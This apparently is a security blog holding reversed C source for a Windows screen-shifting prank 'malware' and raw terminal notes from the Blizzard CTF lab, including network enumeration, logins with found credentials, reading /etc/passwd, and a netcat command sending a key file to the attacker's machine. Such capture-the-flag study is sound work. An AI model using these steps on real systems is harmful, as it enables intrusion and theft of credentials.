Friday, February 11, 2022

Malware that moves the page

 /********************************************************************************************
Author/Reverser    :    x9090
Tested compiler     :    Visual Studio 2003/Visual Studio 2008 Express Edition
Tested Platform    :    WinXP SP2 & WinXP SP3
Disclaimer        :    This source code is provided for educational purposes.
                The author does not take the responsibility of any misuse/voilence/damage
                caused by the contents here

*********************************************************************************************/
#include <windows.h>

// Function prototypes
void change_hor_screen(int);
void change_ver_screen(int);
void prepare_screen();
void horizontal_flipped();
void vertical_flipped();

int    dcHorzres;        //    HORZRES
int    dcVertres;        //    VERTRES
HDC hDC;
HDC hMemoryDC;
HBITMAP    hBitmap;

void change_hor_screen(int x)
{
    int width;
    int height;
    int result;

    width    =    dcHorzres;
    height    =    dcVertres;
    result    =    width - x;

    x        =    ((width + x )% width) % width;
    BitBlt(hDC, x, 0, width - x, height, hMemoryDC, 0, 0, SRCCOPY);
    BitBlt(hDC, 0, 0, x, height, hMemoryDC, width - x, 0, SRCCOPY);
    return;
}

void change_ver_screen(int y)
{
    int width;
    int height;

    width    =    dcHorzres;
    height    =    dcVertres;

    y        =    ((width + y) % width) % width;
    BitBlt(hDC, 0, y, width, height-y, hMemoryDC, 0, 0, SRCCOPY);
    BitBlt(hDC, 0, 0, width, y, hMemoryDC, 0 , height - y, SRCCOPY);
    return;
}    

void prepare_screen()
{
    hDC            =    GetDC(NULL);
    dcHorzres    =    GetDeviceCaps(hDC, HORZRES);
    dcVertres    =    GetDeviceCaps(hDC, VERTRES);
    hMemoryDC    =    CreateCompatibleDC(hDC);
    hBitmap        =    CreateCompatibleBitmap(hDC, dcHorzres, dcVertres);
    SelectObject(hMemoryDC, hBitmap);
    BitBlt(hMemoryDC, 0, 0, dcHorzres, dcVertres, hDC, 0, 0, SRCCOPY);
    
    return;
}

void horizontal_flipped()
{
    int    constant    =    1;                    
    int counter        =    0;                
    int v9            =    0;
    int v11            =    0;
    int width;
    int height;

    width    =    dcHorzres;
    height    =    dcVertres;

    while(counter < 200)
    {
        change_hor_screen(constant * counter * counter);
        Sleep(30);
        counter++;
    }
    
    v9        =    (counter * counter * constant) % width;
    v11        =    counter * 2 * constant;
    counter    =    0;
    while(counter < 200)
    {
        change_hor_screen((counter * v11 + v9) - (counter * counter * constant));
        Sleep(30);
        counter++;
    }

    v9        =    ((counter * v11 + v9) - (counter * counter * constant)) % width;
    v11        =    0;
    counter    =    0;
    while(counter < 200)
    {
        change_hor_screen(v9 - counter * counter * constant);
        Sleep(30);
        counter++;
    }

    v9        =    (v9 - counter * counter * constant) % width;
    v11        =    counter * -2 * constant;
    counter    =    0;
    while(counter < 200)
    {
        change_hor_screen(counter * counter * constant + counter * v11 + v9);
        Sleep(30);
        counter++;
    }

    return;
}

void vertical_flipped()
{

    int    constant    =    1;                    
    int counter        =    0;                
    int v9            =    0;
    int v11            =    0;
    int width;
    int height;

    width    =    dcHorzres;
    height    =    dcVertres;

    while(counter < 200)
    {
        change_ver_screen(constant*counter*counter);
        Sleep(30);
        counter++;
    }
    
    v9        =    (counter*counter*constant)%width;
    v11        =    counter * 2 * constant;
    counter    =    0;
    while(counter < 200)
    {
        change_ver_screen((counter * v11 + v9) - (counter * counter * constant));
        Sleep(30);
        counter++;
    }

    v9        =    ((counter * v11 + v9) - (counter * counter * constant)) % width;
    v11        =    0;
    counter    =    0;
    while(counter < 200)
    {
        change_ver_screen(v9 - counter * counter * constant);
        Sleep(30);
        counter++;
    }

    v9        =    (v9 - counter * counter * constant) % width;
    v11        =    counter * -2 * constant;
    counter    =    0;
    while(counter < 200)
    {
        change_ver_screen(counter * counter * constant + counter * v11 + v9);
        Sleep(30);
        counter++;
    }

    return;
}
int main()
{

    Sleep(30);
    prepare_screen();
    horizontal_flipped();
    vertical_flipped();
    
    // Restore the screen
    BitBlt(hDC, 0, 0, dcHorzres, dcVertres, hMemoryDC, 0, 0, SRCCOPY);
    SelectObject(hDC, hBitmap);
    DeleteDC(hDC);
    DeleteDC(hMemoryDC);
    return 0;
}

Blizzard CTF - part III - notes

 root@kali2:~# tftp 10.0.2.33 69
tftp> get p@5$w0rd.txt
Transfer timed out.
tftp> quit

root@kali2:~# nslookup ctfboard.local
Server:        10.0.7.254
Address:    10.0.7.254#53

** server can't find ctfboard.local: NXDOMAIN

root@kali2:~# nmap 10.0.2.0/24 -p 53

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:15 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00047s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00045s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.80
Host is up (0.00053s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00051s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00040s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00049s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00056s latency).
PORT   STATE  SERVICE
53/tcp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00038s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00034s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

root@kali2:~# cat sombra.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkAPY0zMTQrcMajJrhMeRbJcCJrHQpyVD+3tTsjM+TsuP/Dzw0Y1I+ZXGefgAVwHXvyMkxXodrFZn66Si/VZLRNN3glm0ByPszEVMMpA7d/isQDODAWK9e/moRI3deJ0yjSCZ4TXT/d67Zmd73Pcr5DGkRXtbCSktjHzCnKPkr1T+gnTAINeMXdBqYKQtURwTsXMJ9y7MlxEuCbmjBIkHP90qUcHoaODKPKU0uAnAYXtRHeWk+z3cPlrjLtFTYhstYvSKqhgg5cc61B7t/Q8+Mt/u+ZP+bz5haC8ipvPrHEKwQ5HiNO/+oAQ/+gCcUG/7ja9z1IrqZV3/jl6DddArN

root@kali2:~# nmap -sT 10.0.2.10

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:49 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00039s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
443/tcp  open  https
8888/tcp open  sun-answerbook


root@kali2:~# nslookup scoreboard.local
Server:        10.0.7.254
Address:    10.0.7.254#53

Non-authoritative answer:
Name:    scoreboard.local
Address: 10.0.2.10


root@kali2:~# ssh ubuntu@10.0.2.163 -p 5555
The authenticity of host '[10.0.2.163]:5555 ([10.0.2.163]:5555)' can't be established.
ECDSA key fingerprint is e1:13:83:84:5f:63:9b:7a:e2:e2:f3:e5:15:b0:7d:85.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.0.2.163]:5555' (ECDSA) to the list of known hosts.
ubuntu@10.0.2.163's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.13.0-129-generic i686)

ubuntu@ubuntu:~$ ls
ubuntu@ubuntu:~$ pwd
/home/ubuntu
ubuntu@ubuntu:~$ cd ..
ubuntu@ubuntu:/home$ ls
ubuntu
ubuntu@ubuntu:/home$ cd ..
ubuntu@ubuntu:/$ ls
bin  boot  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz
ubuntu@ubuntu:/$ cd /root
-bash: cd: /root: Permission denied
ubuntu@ubuntu:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

ubuntu@ubuntu:/var/tmp$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ubuntu@ubuntu:/var/tmp$ whoami
ubuntu
ubuntu@ubuntu:/var/tmp$ nano id
ubuntu@ubuntu:/var/tmp$ chmod +x id
ubuntu@ubuntu:/var/tmp$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ubuntu@ubuntu:/var/tmp$ ./id
sudo: unable to resolve host ubuntu
ubuntu@ubuntu:/var/tmp$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ubuntu@ubuntu:/var/tmp$ cat id
# ensure running as root
if [ "$(id -u)" != "0" ]; then
  exec sudo "$0" "$@"
fi
ubuntu@ubuntu:/var/tmp$ sudo id
sudo: unable to resolve host ubuntu
uid=0(root) gid=0(root) groups=0(root)
ubuntu@ubuntu:/var/tmp$ whoami
ubuntu

ubuntu@ubuntu:/var/tmp$ sudo id
sudo: unable to resolve host ubuntu
uid=0(root) gid=0(root) groups=0(root)

root@kali2:~# nc -lnvp 80
listening on [any] 80 ...
connect to [10.0.4.3] from (UNKNOWN) [10.0.4.3] 52345
GET / HTTP/1.1
Host: 10.0.4.3
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0

root@kali2:~# nmap -sU -p 53 --script dns-client-subnet-scan 10.0.2.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 16:53 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00051s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00050s latency).
PORT   STATE SERVICE
53/udp open  domain

Nmap scan report for 10.0.2.80
Host is up (0.00044s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00046s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00046s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00055s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00057s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00045s latency).
PORT   STATE  SERVICE
53/udp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00091s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00080s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap done: 256 IP addresses (10 hosts up) scanned in 4.14 seconds

root@kali2:~# nmap -sV 10.0.2.0-254
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00035s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp  open  ssl/http Microsoft IIS httpd 7.5
8888/tcp open  ssl/http Microsoft IIS httpd 7.5
Service Info: OSs: Unix, Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 10.0.2.33
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE       VERSION
22/tcp    open  tcpwrapped
4848/tcp  open  appserv-http?
12345/tcp open  netbus?

Nmap scan report for 10.0.2.80
Host is up (0.00042s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE    VERSION
3000/tcp closed ppp
3001/tcp open   tcpwrapped

Nmap scan report for 10.0.2.81
Host is up (0.00045s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js (Express middleware)

Nmap scan report for 10.0.2.92
Host is up (0.00036s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
1052/tcp open  http       Tornado httpd 4.2.1
8080/tcp open  http-proxy

Nmap scan report for 10.0.2.128
Host is up (0.00041s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd 1.4.45

Nmap scan report for 10.0.2.163
Host is up (0.00039s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
5555/tcp open   ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.0.2.168
Host is up (0.00053s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
6666/tcp open  irc?


Blizzard CTF - part II

 
  201  sendEmail -f "services@lethallab.com" -t admin@lethallab.com -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: hacker" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

root@kali2:~# cat p@5\$w0rd.txt
blizzard{RightOnTarget}

User: Tracer
Pass: RightOnTarget

root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for 10.0.2.33
Host is up (0.00039s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.80
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00050s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00048s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00043s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00053s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00029s latency).
PORT   STATE  SERVICE
53/tcp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00047s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 256 IP addresses (10 hosts up) scanned in 4.06 seconds
 

root@kali2:~# nmap --dns-server -sL 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:37 PST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.0.2.33
Host is up (0.00047s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
4848/tcp  open  appserv-http
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds
root@kali2:~# ssh Tracer@10.0.2.33
Tracer@10.0.2.33's password:
Permission denied, please try again.
Tracer@10.0.2.33's password:

[1]+  Stopped                 ssh Tracer@10.0.2.33

root@kali2:~# ssh tracer@10.0.2.33
tracer@10.0.2.33's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-97-generic x86_64)

Last login: Sun Nov  5 15:36:47 2017 from 10.0.4.20
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
tracer:~$ ls
sombra_id_rsa  sombra_id_rsa.pub
tracer:~$ cat sombra_id_rsa.pub
*** forbidden command: cat
tracer:~$ nc 10.0.4.3 1234 < sombra_id_rsa.pub
tracer:~$ Write failed: Broken pipe
root@kali2:~#

Blizzard CTF - part I

README file:

Sombra True Random Number Generator (STRNG) is a QEMU-based emulated
hardware device developed by Sombra for Blizzard CTF 2017.

STRNG's QEMU can be run with the following command:

    ./qemu-system-x86_64 -m 1G \
        -device strng \
        -hda my-disk.img \
        -hdb my-seed.img \
        -nographic \
        -L pc-bios/ \
        -enable-kvm \
        -device e1000,netdev=net0 \
        -netdev user,id=net0,hostfwd=tcp::5555-:22

The flag is located at /root/flag on the host. The host uses the same image
as the guest as base image.

You can access the guest over SSH at 10.0.2.163:5555. The
username is "ubuntu" and password "passw0rd". The guest is reset every 10
minutes.

#############

root@kali2:~# snmp-check -t 10.0.2.10
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 [*] Try to connect to 10.0.2.10
 [*] Connected to 10.0.2.10
 [*] Starting enumeration at 2017-11-05 09:13:52
 [*] Error: No response from remote host "10.0.2.10".
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 320.

root@kali2:~# snmp-check -t 10.0.2.33 -p 161
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 [*] Try to connect to 10.0.2.33
 [*] Connected to 10.0.2.33
 [*] Starting enumeration at 2017-11-05 09:25:29

 [*] System information
 -----------------------------------------------------------------------------------------------

 Hostname               : basic
 Description            : Linux basic 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64
 Uptime system          : 19 minutes, 48.35
 Uptime SNMP daemon     : 19 minutes, 39.76
 Contact                : nobody@example.org
 Location               : blizzard{p@5$w0rd.txt}
 Motd                   : -

 [*] Devices information
 -----------------------------------------------------------------------------------------------

    Id                 Type   Status  Description

 196608            Processor  Running  GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz
 196609            Processor  Running  GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz
 262145              Network  Running  network interface lo
 262146              Network  Running  network interface ens160
 786432          Coprocessor  Unknown  Guessing that there's a floating point co-processor

 [*] Storage information
 -----------------------------------------------------------------------------------------------

 Physical memory
    Device id       : 1
    Device type     : Ram
    Filesystem type : LinuxExt2
    Device units    : 1024
    Memory size     : 993M
    Memory used     : 575M
    Memory free     : 418M



 [*] Processes
 -----------------------------------------------------------------------------------------------

 Total processes : 116

 Process type    : 1 unknown, 2 operating system, 3 device driver, 4 application
 Process status  : 1 running, 2 runnable, 3 not runnable, 4 invalid

 Process id              Process name  Process type  Process status  Process path

          1                   systemd             4               2  /sbin/init
         10                watchdog/0             2               2  
       1003                       atd             4               2  /usr/sbin/atd
       1006                  vmtoolsd             4               2  /usr/bin/vmtoolsd
       1008                  rsyslogd             4               2  /usr/sbin/rsyslogd
       1009                      cron             4               2  /usr/sbin/cron
       1014           accounts-daemon             4               2  /usr/lib/accountsservice/accounts-daemon
       1015            systemd-logind             4               2  /lib/systemd/systemd-logind
       1017                     lxcfs             4               2  /usr/bin/lxcfs
       1026               dbus-daemon             4               2  /usr/bin/dbus-daemon
       1074                     acpid             4               2  /usr/sbin/acpid
       1079                     snapd             4               2  /usr/lib/snapd/snapd
       1090                     mdadm             4               2  /sbin/mdadm
       1094                   polkitd             4               2  /usr/lib/policykit-1/polkitd
         11                watchdog/1             2               2  
       1121              kworker/1:1H             2               2  
       1189                      sshd             4               2  /usr/sbin/sshd
       1191                     named             4               2  /usr/sbin/named
       1193                       php             4               2  /usr/bin/php
       1195                       php             4               2  /usr/bin/php
       1198                    python             4               2  /usr/bin/python
         12               migration/1             2               2  
       1217                    iscsid             4               2  /sbin/iscsid
       1218                    iscsid             4               2  /sbin/iscsid
       1278                    atftpd             4               2  /usr/sbin/atftpd
       1284           inetutils-inetd             4               2  /usr/sbin/inetutils-inetd
       1287                irqbalance             4               2  /usr/sbin/irqbalance
       1299                    agetty             4               2  /sbin/agetty
         13               ksoftirqd/1             2               2  
       1315                     snmpd             4               1  /usr/sbin/snmpd
       1382           systemd-network             4               2  /lib/systemd/systemd-networkd
         14               kworker/1:0             2               2  
        148                mpt_poll_0             2               2  
        149                     mpt/0             2               2  
         15              kworker/1:0H             2               2  
        150                 kpsmoused             2               2  
         16                 kdevtmpfs             2               2  
         17                     netns             2               2  
         18                      perf             2               2  
        180                 scsi_eh_2             2               2  
        181                scsi_tmf_2             2               2  
        182                    bioset             2               2  
        183                  ttm_swap             2               2  
         19                khungtaskd             2               2  
          2                  kthreadd             2               2  
         20                 writeback             2               2  
       2017                        sh             4               2  sh
       2018                      ping             4               2  ping
       2079              kworker/u4:2             2               2  
         21                      ksmd             2               2  
       2142               kworker/1:1             2               2  
       2167                      sshd             4               2  sshd: unknown [priv]
       2168                      sshd             4               2  sshd: unknown [net]
       2170                      sshd             4               2  sshd: [accepted]
       2171                      sshd             4               2  sshd: [net]
         22                khugepaged             2               2  
         23                    crypto             2               2  
         24               kintegrityd             2               2  
         25                    bioset             2               2  
         26                   kblockd             2               2  
        268                   raid5wq             2               2  
         27                   ata_sff             2               2  
         28                        md             2               2  
         29                devfreq_wq             2               2  
        292                  kdmflush             2               2  
        293                    bioset             2               2  
          3               ksoftirqd/0             2               2  
         30              kworker/u4:1             2               2  
        302                  kdmflush             2               2  
        303                    bioset             2               2  
         32               kworker/0:1             2               2  
        321                    bioset             2               2  
         34                   kswapd0             2               2  
        345               jbd2/dm-0-8             2               2  
        346           ext4-rsv-conver             2               2  
         35                    vmstat             2               2  
         36             fsnotify_mark             2               2  
         37           ecryptfs-kthrea             2               2  
        395              kworker/0:1H             2               2  
        399                  iscsi_eh             2               2  
          4               kworker/0:0             2               2  
        408           systemd-journal             4               2  /lib/systemd/systemd-journald
        412               kworker/1:2             2               2  
        424                   kauditd             2               2  
        438                   ib_addr             2               2  
        440                  ib_mcast             2               2  
        441               ib_nl_sa_wq             2               2  
        442                   lvmetad             4               2  /sbin/lvmetad
        443                     ib_cm             2               2  
        449                  iw_cm_wq             2               2  
        451                   rdma_cm             2               2  
        468             systemd-udevd             4               2  /lib/systemd/systemd-udevd
          5              kworker/0:0H             2               2  
         53                  kthrotld             2               2  
         54           acpi_thermal_pm             2               2  
         55                    bioset             2               2  
         56                    bioset             2               2  
         57                    bioset             2               2  
         58                    bioset             2               2  
         59                    bioset             2               2  
         60                    bioset             2               2  
         61                    bioset             2               2  
         62                    bioset             2               2  
         63                 scsi_eh_0             2               2  
         64                scsi_tmf_0             2               2  
         65                 scsi_eh_1             2               2  
         66                scsi_tmf_1             2               2  
          7                 rcu_sched             2               2  
         72             ipv6_addrconf             2               2  
          8                    rcu_bh             2               2  
        843           ext4-rsv-conver             2               2  
        867           systemd-timesyn             4               2  /lib/systemd/systemd-timesyncd
         87                   deferwq             2               2  
         88           charger_manager             2               2  
         89                    bioset             2               2  

  [*] Network interfaces
 -----------------------------------------------------------------------------------------------

 Interface               : [ up ] lo

    Interface Speed  : 10 Mbps
    IP Address       : 10.0.2.33
    Netmask          : 255.255.255.0
    MTU              : 65536
    Bytes In         : 13033 (13K)
    Bytes Out        : 13033 (13K)

 Interface               : [ up ] VMware VMXNET3 Ethernet Controller

    Hardware Address : 00:0c:29:d1:04:53
    Interface Speed  : 4294.967295 Mbps
    IP Address       : 127.0.0.1
    Netmask          : 255.0.0.0
    MTU              : 1500
    Bytes In         : 23843778 (23M)
    Bytes Out        : 11290971 (11M)


 [*] Routing information
 -----------------------------------------------------------------------------------------------

      Destination      Next Hop           Mask    Metric

          0.0.0.0       10.0.2.254          0.0.0.0        1

 [*] Listening TCP ports and connections
 -----------------------------------------------------------------------------------------------

   Local Address   Port      Remote Address   Port       State

         0.0.0.0  12345             0.0.0.0      -       Listening
         0.0.0.0     22             0.0.0.0      -       Listening
         0.0.0.0   4848             0.0.0.0      -       Listening
        10.0.2.33  12345           10.0.4.93  42558     Established
       10.0.2.33     22          10.0.4.192  55360     Established
       10.0.2.33     22           10.0.4.84   7821     Established
       10.0.2.33   4848          10.0.4.121  60157      Close wait
       10.0.2.33   4848           10.0.4.93    816    SYN received
       10.0.2.33     53             0.0.0.0      -       Listening
       127.0.0.1     53             0.0.0.0      -       Listening

 [*] Listening UDP ports
 -----------------------------------------------------------------------------------------------

   Local Address   Port

         0.0.0.0    161
         0.0.0.0  39876
         0.0.0.0  52793
         0.0.0.0     69
       10.0.2.33     53

 [*] Mountpoints
 -----------------------------------------------------------------------------------------------

 /
 /run
 /dev/shm
 /run/lock
 /sys/fs/cgroup
 /boot

 [*] Enumerated 10.0.2.33 in 3.85 seconds
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 230.

root@kali2:~# nmap -sV 10.0.2.33 -p- -T4

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 09:34 PST
Nmap scan report for 10.0.2.33
Host is up (0.00033s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE       VERSION
22/tcp    open  tcpwrapped
4848/tcp  open  appserv-http?
12345/tcp open  netbus?


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.44 seconds
root@kali2:~# ping 10.0.2.33
PING 10.0.2.33 (10.0.2.33) 56(84) bytes of data.
64 bytes from 10.0.2.33: icmp_seq=1 ttl=63 time=0.484 ms
64 bytes from 10.0.2.33: icmp_seq=2 ttl=63 time=0.465 ms
64 bytes from 10.0.2.33: icmp_seq=3 ttl=63 time=0.464 ms
64 bytes from 10.0.2.33: icmp_seq=4 ttl=63 time=0.528 ms
^C
--- 10.0.2.33 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 0.464/0.485/0.528/0.030 ms



 [*] Network information
 -----------------------------------------------------------------------------------------------

 IP forwarding enabled   : no
 Default TTL             : 64
 TCP segments received   : 63274
 TCP segments sent       : 56762
 TCP segments retrans.   : 133
 Input datagrams         : 447293
 Delivered datagrams     : 434967
 Output datagrams        : 428890

 [*] Network interfaces
 -----------------------------------------------------------------------------------------------

 Interface               : [ up ] lo

    Interface Speed  : 10 Mbps
    IP Address       : 10.0.2.33
    Netmask          : 255.255.255.0
    MTU              : 65536
    Bytes In         : 12361 (13K)
    Bytes Out        : 12361 (13K)

 Interface               : [ up ] VMware VMXNET3 Ethernet Controller

    Hardware Address : 00:0c:29:d1:04:53
    Interface Speed  : 4294.967295 Mbps
    IP Address       : 127.0.0.1
    Netmask          : 255.0.0.0
    MTU              : 1500
    Bytes In         : 44268065 (43M)
    Bytes Out        : 46057596 (44M)


 [*] Routing information
 -----------------------------------------------------------------------------------------------

      Destination      Next Hop           Mask    Metric

          0.0.0.0       10.0.2.254          0.0.0.0        1

 [*] Listening TCP ports and connections
 -----------------------------------------------------------------------------------------------

   Local Address   Port      Remote Address   Port       State

         0.0.0.0  12345             0.0.0.0      -       Listening
         0.0.0.0     22             0.0.0.0      -       Listening
         0.0.0.0   4848             0.0.0.0      -       Listening

 [*] Listening UDP ports
 -----------------------------------------------------------------------------------------------

   Local Address   Port

         0.0.0.0    161
         0.0.0.0  39876
         0.0.0.0  52793
         0.0.0.0     69
       10.0.2.33     53

 
 [*] Mountpoints
 -----------------------------------------------------------------------------------------------

 /
 /run
 /dev/shm
 /run/lock
 /sys/fs/cgroup
 /boot
 /run/user/1001

 [*] Enumerated 10.0.2.33 in 2.71 seconds
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 230.
 

root@kali2:~# snmp-check -t 10.0.2.33 -c private
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 [*] Try to connect to 10.0.2.33
 [*] Connected to 10.0.2.33
 [*] Starting enumeration at 2017-11-05 13:54:05
 [*] Error: No response from remote host "10.0.2.33".
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 320.
root@kali2:~# snmpwalk -v2c -c public 10.0.2.33
iso.3.6.1.2.1.1.1.0 = STRING: "Linux basic 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
